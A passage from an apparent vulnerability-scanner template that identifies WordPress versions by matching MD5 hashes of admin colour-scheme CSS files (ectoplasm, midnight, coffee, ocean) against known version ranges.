"(\"0d1a0d8f3ab5b6e25f4f103f1d3cf86b\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"77b44680773c336a5659fc5a9c9fde6f\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"0e6724bfb006014e90657b5c56e32f5d\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"3d3fa848ebeee0e47d8413f2eac194cf\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"9cedba0f9265f1b2b08d9138ad1bb036\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/ectoplasm/colors.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"51f80d9f509d4e6b4ea38713046e191b\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"b21f32953ad167424e9997c8ff5330ae\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"4aedfb3a03d238a248b4628c1e82ecb6\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"4dd99f07b59e50a102badca4bc47cca6\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"c3e46fa1074909ce32b410a3c854f4c8\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"9538ad4bdbecfe10e0bfac3898ee6286\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"c6cba3cc3536f8a8fe608a3d0a9f2f77\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.26 - dsl: - - "(\"8e0f8b89694e5b4a5d0ba46a6131216f\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"baee08bf04fae25e404d79ad8a453441\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"e88d7626123a0d67492d7bc7546acb5d\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"71e7589f78c5423719c15ebe510f4d25\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"738e2988d6f176a6417259f9514d5ee4\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"848a1e64ad9724ed9e0a9c6d82069f3a\" == md5(body))" - - type: dsl - name: 4.0.27 - 4.0.32 - dsl: - - "(\"6238d0ebc1d2a983d66751824f6cb346\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.33 - dsl: - - "(\"277685e5afc03cf65a847209b79d1726\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"5e052b9c314c8bb2e0bc7fede0cf99f4\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"4f949efcb806d798e79ebdf9aaf3b2ed\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"354c7b8d83ff3082546ce84bc35b68fa\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"76c9149b643865cb7eda2c945a277f26\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"76ecad6845904edb3738a64d07f44400\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/ectoplasm/colors-rtl.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"46d310711143ee1c98f788eeed72f49e\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"093dcce1588c3b8cc4b40fc311974412\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"2c7b7f7ea3d09d89912f8a2190caf555\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"a5e5038516f1c5931a290a13aff1a7c6\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"f906280467b81f0c303c11ecf5449a11\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"58f1d1b2e4ed824585e5cfa1757f49c1\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"1d4145177c30d6f02944c86d0b58f102\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.26 - dsl: - - "(\"7b047656b2f21f7355ee6745b28de219\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"1a4202bd816477e41390b35e6f23a9e6\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"650ae2f4d9930650021832a5b414e780\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"cf22f6cdf0c754d17e18968603839536\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"77c6202426a5983dffd4b82d6e2b765d\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"178e8fa9b390e7f0054063aacf4adc81\" == md5(body))" - - type: dsl - name: 4.0.27 - 4.0.32 - dsl: - - "(\"8baf66f851e91365c2a21a3fbf653055\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.33 - dsl: - - "(\"0ed3663628636356a6c1d4a5860ed575\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"8f458bd7c92c980080e17ae981fecc2c\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"07ce24d7e0075965b3276d32c9fdfc22\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"137ebc979d28ffb33eb9b131df733331\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"637446b49f93150cbc269d734466eba9\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"1395526a63e11cad214746d1a5367040\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/midnight/colors.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"f9eaa22ba873fe30c5adecec9275dfef\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"0657508b14c063564f0001878ea88d07\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"d55664f8f653664ce2f4a360a7aabf7e\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"2155bdba4f4aa5090b8b8fe168c537f6\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"1c2a62ec116bd5398f75e699028af52d\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"7828a09a10e456933f4f44a27bc9e760\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"088645d63d59b9e2b876d25ecea8b591\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.26 - dsl: - - "(\"4995824719b80769472867ab6a0f9d6e\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"6c2f1e4fbe3db1322b38e577bceeeb25\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"8234cd28ef883f225abf8061ccd3af9b\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"bd3be68c8212aeabe5af215df5e0d0cb\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"7636b2ab8523286785d75fd3d7e537e4\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"acb549c4ac075b8c2af1138b234cf093\" == md5(body))" - - type: dsl - name: 4.0.27 - 4.0.32 - dsl: - - "(\"e475c1a0cd8fdfc4ded9551d5bed4ca5\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.33 - dsl: - - "(\"ad984fa369ed10821d387cd909ea5649\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"e3bd414de7534790a8761e1767e0f072\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"4cb56002de1209c98e9ba405858cbbb4\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"5240a5d120f3de68f50aa14c42f42ebe\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"baddad393fd77ce3eded19a47f596189\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"2481535f18cae31b8be4ed6d233b4158\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/midnight/colors-rtl.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"58dae4b75a6f54d583e36870591fbc46\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"9527914dee63a89cf72473fb23bf063f\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"99ac5a3755ed5acd78360f589e880dcf\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"ff228ab4531174f9292c7d4689eea615\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"8018aa2ae5df17ae3ba3b88fe1818fd8\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"7386ebd85ed17227277f38bf986ec649\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"27c54160898b88b4dd86baa0c0618d1a\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.26 - dsl: - - "(\"9e8cdcc5820931f3324339f6ec30bdcb\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"94457336df384eee6f64773fa914a609\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"e0541afbb33bc7389acc383dfdd91819\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"c4229460e28195d59dadc5927b591ef3\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"145d2df39b9a8604db59465b36b081b6\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"aecd603f94e7bbd2ef18fd360bb6652d\" == md5(body))" - - type: dsl - name: 4.0.27 - 4.0.32 - dsl: - - "(\"b57d5dd40e05c32a431749322009f234\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.33 - dsl: - - "(\"52b7e848e2bb6607b4e714ce168d335e\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"3b1b999fc3b428d847eff0cc1008c21e\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"e12dc487d41f9eb74752df4e280e69f2\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"ac60e49d77c6b5245f56a5221d1fadf5\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"12e96ecc678c3dce24ea3ff7351b8767\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"9421a5f0d00af3d1205fd185c1cdf61b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/midnight/colors-rtl.min.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"ecb168ac881b1974386d6722018589df\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"6bbde2ec66d17f54b8ce67e0519310c8\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"45a1dc3597f440d818d7adaaec694a3d\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"c1724aa74b85565ad129608093d951a7\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"46d38df7939457add9e0cb01862625fd\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"bcbc1b8d22c46e76d9a39507376b81c5\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.26 - dsl: - - "(\"ed5bc7004a118f6b9b4fddeb82d9d78a\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"01177358c121a44d888428eb66a3fdce\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"5f2622d75f92cd287dadd410b99aba43\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"949cb3874d4150bf45d54d02f108bc1d\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"16de8dbce800ca3a800c5a27a85c9adb\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"faad862c1c60e1afe18e910b2a56f886\" == md5(body))" - - type: dsl - name: 4.0.27 - 4.0.32 - dsl: - - "(\"456fa1aacdc754b7e61e1b8e32411a15\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.33 - dsl: - - "(\"3df2f7e94dc064133dce5ecca4a705d2\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"41dbb400a0c7f340a9c93ec5530fc138\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"73b50e985b5ddbe2afdf3e60fe3c91e9\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"13a62affb19421a576f61b45959ad2c8\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"ce815c6eedce1fe226862aa2465f7b07\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"ae10dfdf20966c5a31ab73f6045dfb36\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/midnight/colors.min.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"ec678f19e1681ae3cfc6cc15d1b0a128\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"9757ca09dddfa5a983e2b25f826a96ca\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"fc8831d91e726e0f99730adde37e9175\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"29888360ce68d130f41ed391bd647ab3\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"b048ef915d1fa35107bc54d96bdca463\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"229cd304fee2141d2b8ac2be3002fbdd\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.26 - dsl: - - "(\"c09c501be59486f3a7ec42c322e929cc\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"05b8d5e2e09cb5ec16cb2991c857719c\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"22803a84f503c895cc540b01da3c8059\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"3c8eb91438052ad8ed3e5c407bb46871\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"a58fdad36db9fddd391c6960b8cff21c\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"e03f63363d23a124c1940a6a9c657441\" == md5(body))" - - type: dsl - name: 4.0.27 - 4.0.32 - dsl: - - "(\"0c0eaf1b7049bacb2efcf7a5bd5b9669\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.33 - dsl: - - "(\"10ea1bb4f8fb13aaa4aadf13744d4410\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"580dc16a24cd582e8afaee49d73dcf7e\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"3e5b7d16274bc2b3f7ee49a35652af36\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"95098be791e68f428e6a0b0f6cdae29b\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"b6940b5dad3790211178cde06f029e59\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"4909e03ca72e1fe17343df6135f57091\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/coffee/colors.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"31f8a34795536919f4d903f31b2c2abf\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"2bd83c43aed60c175a0f8c5d2738639b\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"f032e42bc6cb2033bfde657c7494337e\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"dba131a88a68e7acbb7b3cec28db1dcb\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"46a337f2ec44eb87918c06bc84f82a55\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"b4cd3218e3c6e52336a8da60cf847d4c\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"594f599a5d8f91d07fc0f317117561a7\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.26 - dsl: - - "(\"1e500dd63ae97e399dbd6cee43d72ec8\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"2208e58ad099a1ce01177a1a7e6f3190\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"0ad4b42efbdb5ad11a01ebb7dc75178a\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"059a5265a9a022fa492324fb90341055\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"263d280c18ac772f266f0985ae36973a\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"aa969b60bb26bcbd12d6a33f9b831475\" == md5(body))" - - type: dsl - name: 4.0.27 - 4.0.32 - dsl: - - "(\"20d616b7596b9f004dbdee4875d60d85\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.33 - dsl: - - "(\"dd7a1f669975f835a5463265fcbf228c\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"7e6bd22f6f3f59a6bb67cfb0a07724b5\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"fb9e5d2fa6a3a341c965a0df67cd5c20\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"4383fff6b3f7a39f54c8d4ea2e96fbf5\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"e8e158e8c1e00d330901a6c0551b640d\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"d344cf96de87c8ade83fd1680ee9fa21\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/coffee/colors-rtl.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"e990ccbcd406eb7639db1966040a4169\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"74dab612b62647eeac56102d9fded496\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"7a6adb6f93ebe47bb2a49bac118ffe24\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"6509268c1c5e84a108c0030e7f1e8eed\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"b8a702008f8b8b1a38b0a2ef37723c6e\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"2272c3bc872bdcce77a6b8d0ec902701\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"4660617cfae6b1ec687fe800ea238cd5\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.26 - dsl: - - "(\"2a31c90c6060eb8c9b696e90455d31d5\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"d2b89a3e73c87b9c39794a4bf201dbb7\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"374ddd0bfada7b8e7e08c3ad75e719c6\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"e1f8d2bad643e1a93cc9f2d5908e60aa\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"f8fe8659b15b8e5ee7c5bfd9aa067b73\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"f15d9c97b13b36e554fc800efe93b368\" == md5(body))" - - type: dsl - name: 4.0.27 - 4.0.32 - dsl: - - "(\"4bf44f2d95e5e446d85aeeffe626e135\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.33 - dsl: - - "(\"b783d66f5de1122b846fccc7f2caace7\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"7c55de81d6e8396466061214d797db17\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"7229d3fc179243a547504368f3516128\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"68bc26788771128a9d2c94547a6cf568\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"fa7fa07fb1b4e8f58ec2a0a310171aa6\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"0f2dd46bb4fc24d6f3a8aef983cb90cc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/ocean/colors.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"42686d5afca9aeb0ac4b04b6c35df0e7\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"3a51a395483d77757c9e1d236651417b\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"d04d8dba0a8390d11aafe4f5a03dc972\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"66a395bc778d300fc5f0b2d77daa1fbd\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"744e9c6c33a37d9db3ad2f57318efa09\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"58be4f65a594e084222693e8fba9867e\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"6882c09b189df57714ce0dbf7634d0b6\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.26 - dsl: - - "(\"3b3f6318207f03b0ed86af7b1c4529a4\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"02fc9e590e7423aba6c478c4782d07bd\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"c414758f69c13dff67ef7ce2b57350bf\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"7434d42be65938ef44ee3a474ccf72dd\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"df4944e91c7bbe26599df8827fc4b142\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"b4a5193ac0855c1ee4581034b950c5d3\" == md5(body))" - - type: dsl - name: 4.0.27 - 4.0.32 - dsl: - - "(\"114677d80b4276c22ccd8558a39e3399\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.33 - dsl: - - "(\"81e903a56357b68812980d1e26dabd97\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"2ba44c4cfab37459e99c503bcfbe6549\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"4290f926950485af972020a1c2e17bdd\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"33af6a595d5d60440c80fa0acefde63c\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"08a72f44a7ba011db56013197d1e84c9\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"6a70ed7d062bd418c3ecc45126d9e047\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/ocean/colors-rtl.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"3942519c51eac40a974afe4e692311a9\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"0d868fe77c55aa8086815541a5febdf5\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"f8b49360db7b06106c295535de575d1f\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"6803f9cacd5c572ea07a6191c6b3a955\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"e6e9cf722d8de33ad8061c14181b9d02\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"83320550041b6ac4a3b224f8cd66a156\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"f3f1049fff65b59b6ee73c8324a06d6b\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.26 - dsl: - - "(\"8391fa695eb835e0e2c9058881359ac4\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"df07ae9eb80c843ee9851cc07c745a6b\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"3b9137f812aa6cf6a5038fd0e8cbd68c\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"9a55f6f39ed642323724a678c9cfa4b5\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"8bef0b039c5cc85393c4f82a39ebe1eb\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"8cfd80664f79160c558113bdc45f66f8\" == md5(body))" - - type: dsl - name: 4.0.27 - 4.0.32 - dsl: - - "(\"ac9b85a8997fad0424ed768c8b3a7fab\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.33 - dsl: - - "(\"ddd584a26b38564d2bffe96173cc0fdb\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"5a07925c796f75ebb2481b73dbf50e28\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"0cf2e52c89e754af7315d139c676b42b\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"4618abb323cd6804dd9602b097eb01d5\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"c56df1affc4b4d719a6961d1ab11c67d\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"a19b01302b963beb183ae967896f4c1a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/ocean/colors-rtl.min.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"e6c6ccbf9d3324987324ed2802a695de\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"124e45c18cfbd0d1c69dbb6e6cbcbd72\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"22dbd1fcd0396ec5d53b9ac70986ce4d\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"6aa2e9fb264e5c58d2a755d1b09cdad2\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"9b6c0b762c7c8c9edb0fdf22fd85084f\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"10aec0930bf49892f26ae12a2161d9f5\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.26 - dsl: - - "(\"f8efb32e4c1bfdc779625bfab3ef29f5\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"054be6e2d37a4035c4f1f2fac9ca6071\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"6d2aa9063ac3cd5e37c836d8e4e6ac1c\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"ff093ff18aef2de35d910e9bc7300a63\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"f26236f80294976fd03cd01ea7c119de\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"2045d8aca5c756472323069740e9d9ec\" == md5(body))" - - type: dsl - name: 4.0.27 - 4.0.32 - dsl: - - "(\"aa4bf2f4b402f8118a05f003f6b3ed10\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.33 - dsl: - - "(\"0178835344242e30c4d31e3929ad8277\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"e28e04ceb70d5482bb78052f6185a4f3\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"3a9c2e1817bfe75b9f3ca3dc73727ec2\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"f01b1c814f1b4e0889587391222ce56f\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"84becdf4915595c2ee74a32b8c98d982\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"4ff67a17f525872e5810c7433ef3ecab\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/ocean/colors.min.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"6def631dce1084cd5e47ec236997ac76\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"eb668f9051822ba6ba7d0730fc7c7ab5\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"4ed0de0e34ed26b0cba26e9845c4b6a3\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"9533bb981ce46f45ce5d8359112e400e\" 